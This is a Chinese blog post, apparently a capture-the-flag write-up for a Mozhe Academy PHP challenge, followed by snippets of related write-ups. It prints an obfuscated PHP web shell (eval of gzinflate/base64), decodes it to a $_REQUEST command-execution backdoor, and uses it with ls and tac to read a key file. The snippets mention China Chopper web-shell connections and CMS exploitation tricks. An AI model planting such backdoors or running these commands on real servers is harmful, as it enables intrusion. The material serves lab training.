墨者学院 - PHP代码分析溯源(第4题)

最新推荐文章于 2024-03-07 18:03:03 发布
最新推荐文章于 2024-03-07 18:03:03 发布
阅读量1.1k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: php Mozhe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42357070/article/details/81430720
本文通过一个具体的PHP代码示例,展示了如何解析被base64加密并gzinflate压缩的恶意代码,揭示了命令执行漏洞的存在,并演示了如何利用该漏洞获取关键信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开发现提示key在根目录,且给出代码
<?php
eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)));
?> 
这是base64加密+压缩的编码
简单方法就是直接把eval改成echo输出
执行<?php
echo(gzinflate(base64_decode(‘40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==’)));
?> 

 


得到echo `$_REQUEST[a]`;; ?>
发现有命令执行漏洞

直接给a传入 ls -al

ip/f.php?a=ls      显示所有文件

发现key,直接用cat没读出来(查看源码可看到),用tac读取得到key。

 

7.12. 溯源分析
Sumarua的博客
07-23 5307
文章目录7.12. 溯源分析7.12.1. 攻击机溯源技术7.12.1.1. 基于日志的溯源7.12.1.2. 路由输入调试技术7.12.1.3. 可控洪泛技术7.12.1.4. 基于包数据修改追溯技术7.12.2. 分析模型7.12.2.1. 杀伤链(Kill Kain)模型7.12.2.2. 钻石(Diamond)模型7.12.3. 关联分析方法7.12.3.1. 文档类7.12.3.2. 行为分析7.12.3.3. 可执行文件相似性分析7.12.4. 清除日志方式 7.12. 溯源分析 7.12.1.
墨者学院 - PHP代码分析溯源(第1)
多崎巡礼的博客
07-30 930
1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。 2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。 3、$__=("`"^"?").(":"^"}").("%.
墨者学院-PHP代码分析溯源(4)
JimWu的博客
09-04 436
PHP代码分析溯源(4) 难易程度:★★★ 目类型:命令执行 使用工具:FireFox浏览器 1.打开靶场,看到一串php代码。 2.使用echo,运行一下代码。 <?php echo(gzinflate(base64_decode("&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&"))); ?> 得到echo $_REQU...
墨者学院 PHP代码分析溯源(4) 详解
永远是少年
12-11 948
今天继续给大家介绍CTF通关writeup,本文主要内容是墨者学院 PHP代码分析溯源(4)。 一、目简介 二、破解源码 三、命令执行拿到key
墨者PHP代码分析溯源(4)
zr1213159840的博客
01-16 774
首先打开页面,有个提示,而且还有段代码 仔细看下这段代码 <?php eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&))); ?> 能看出来首先是一段字符进行了解码,通过末尾的等于能看出来这是一段base64的解码,然后再使用前面的gzinflate函数执行了一次。gzinflate函数通过查询看是对数据进行了压缩,那么这段代码的含义就是对后面的字符串先解密然后压缩。我们直接对ev
PHP代码分析溯源(4)
qq_36933272的博客
09-05 189
出现一串php代码,输出查看结果 获取表单a的内容,在f.php后面直接加?a=ls查看目录 发现key的php文件,直接a=cat key_228162644911001.php发现显示不出来 查看源代码得到key 查阅资料后发现tac替换cat就看的到了,tac是cat相反命令,也就是倒过来输出 ...
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 876
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.youkuaiyun.com/qq_24196029/article/details/78118680     &lt;?php error_reporting(0); call...
墨者学院 - WebShell代码分析溯源(4)
多崎巡礼的博客
08-02 758
唉让我如此信任的工具在这道上栽了跟头。。。嗯,以后的结果仅供参考。   下载源代码,在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马 且获得其密码,通过菜刀连接 菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...
墨者学院 - CMS系统漏洞分析溯源(第5)
多崎巡礼的博客
10-29 1679
phpecms1.3 cookies欺骗漏洞进后台 phpecms1.3/admin/cms_check.php &lt;?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?&gt;   判断如果没有admin_na...
墨者学院-CMS系统漏洞分析溯源(第7)
JimWu的博客
09-04 1037
CMS系统漏洞分析溯源(第7) 难易程度:★★ 目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场,先在网上查一下dedecms的漏洞。 知道了有能在重置密码页面修改任意用户密码的漏洞 2.用御剑随便扫扫,然后打开burpsuite,访问/member/resetpassword.php,截包。 我们send to repeater,修改get的参数 ?...
360众测靶场库之25-PHP代码分析溯源(4)
zjl12344的博客
03-07 253
360众测靶场
墨者_PHP代码分析溯源(4)
weixin_50698958的博客
10-13 279
靶场: https://www.mozhe.cn/bug/detail/T0YyUmZRa1paTkJNQ0JmVWt3Sm13dz09bW96aGUmozhe 背景介绍 小明收到一个网址,打开后是一串加密的代码。 小明需要你们的帮助,感受到时代在召唤了吗? 实训目标 1.了解命令执行的基础知识; 2.学习php代码的相关知识; 3.了解加密解密的相关知识; 解思路: 1、打开页面,提示信息如下 2、用php在线工具,使用echo运行一下代码(http://www.dooccn.com
PHP源码分析-面向对象()
duoerbasilu
01-02 191
PHP中,面向对象与Class是密切相关的,来看看在内核中如何实现Class的接口、继承、私有、受保护、公开等特性。 一、创建类 zend_class_entry是内核中定义的一个结构体,是PHP中类与对象的基础结构类型。 如何在扩展中定义myclass类,并能够在PHP中能够实例化?PHP中看起来像这样: &lt;?php $obj = new myclass(); ?&gt; ...
php 性能分析_PHP-代码分析和性能分析
cunchi8090的博客
07-20 347
php 性能分析 Let's say you have a PHP script that is performing slow. You've gone through all the steps you can think of to figure out what is wrong, or it's just too complex of an app...
php代码分析工具,PHP代码静态分析工具PHPStan
weixin_35340730的博客
03-09 457
最近发现自己写的PHP代码运行结果总跟自己预想的不一样,排查时发现大多是语法错误,在运行之前错误已经种下。可能是自己粗心大意,或者说php -l检测太简单,不过的确是有一些语法错误埋藏得太深(毕竟PHP是动态语言),那么有没有办法,在代码代码正式运行之前,把语法错误全找出来呢?这里介绍一款PHP代码静态分析工具:PHPStan,不需要运行代码,也可以对代码进行严格的语法检测,尽量将代码运行错误率降...
墨者学院 - PHP代码分析溯源(第3)
多崎巡礼的博客
08-03 760
在for 循环中是判断输入的字符是否有存在在1和9之间的数字 如果不存在判断是否等于54975581388 等于则绕过 即 又不能等于数字1-9又要等于54975581388 但是这里在比较的时候就是用弱类型的,所以不要求完全一致。 php在转码时会把16进制转化为十进制.于是把54975581388转化成16进制0xccccccccc 键入 0xccccccccc 输入得到key...
php版本代码分析,分析和解析PHP代码的7大工具
weixin_34812649的博客
03-25 253
PHP已成为时下最热门的编程语言之一,然而却有许多PHP程序员苦恼找不到合适的工具来帮助自己分析和解析PHP代码。今天小编就为大家介绍几个非常不错的工具,来帮助程序员们提高自己的工作效率,一起来看看吧!PHP ParserPHP-Parser是一个用PHP编写的PHP解析器(支持PHP 5.4以及更早的版本),这种特殊的解析器非常适合静态代码分析。该工具的目的就是简化静态代码分析和操作,它使程序员...
代码审计 PHP代码理解.
网络安全领域___专研者.
03-21 4700
PHP语言的 概括: (1)PHP 是可以创建动态交互性站点的强有力的服务器端的脚本语言。 (2)PHP可以做很多东西,特别是web网站开发,也可以使用的非常广泛。能够快速,灵活,实用使得PHP语言可以更好的开发任何网站。 (3)PHP 是一种 HTML 嵌入式的脚本语言。php文件以.php结尾。PHP语言的很多语法来自 C,Java 和 Perl,并具有几个 PHP 独有的特点。PHP语言的主要目标是让 Web 开发程序员可以快速的书写动态生成的网页。
网络安全—溯源分析
m0_69801663的博客
12-12 1020
溯源分析,溯源技术
墨者学院WebShell文件上传漏洞分析溯源(第1)
最新发布
04-03
### 墨者学院 WebShell 文件上传漏洞分析与溯源方法 #### 背景概述 WebShell 是一种嵌入到目标服务器中的脚本程序,攻击者可以通过它远程控制受害者的服务器。文件上传漏洞通常允许攻击者通过伪造请求或其他手段绕...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值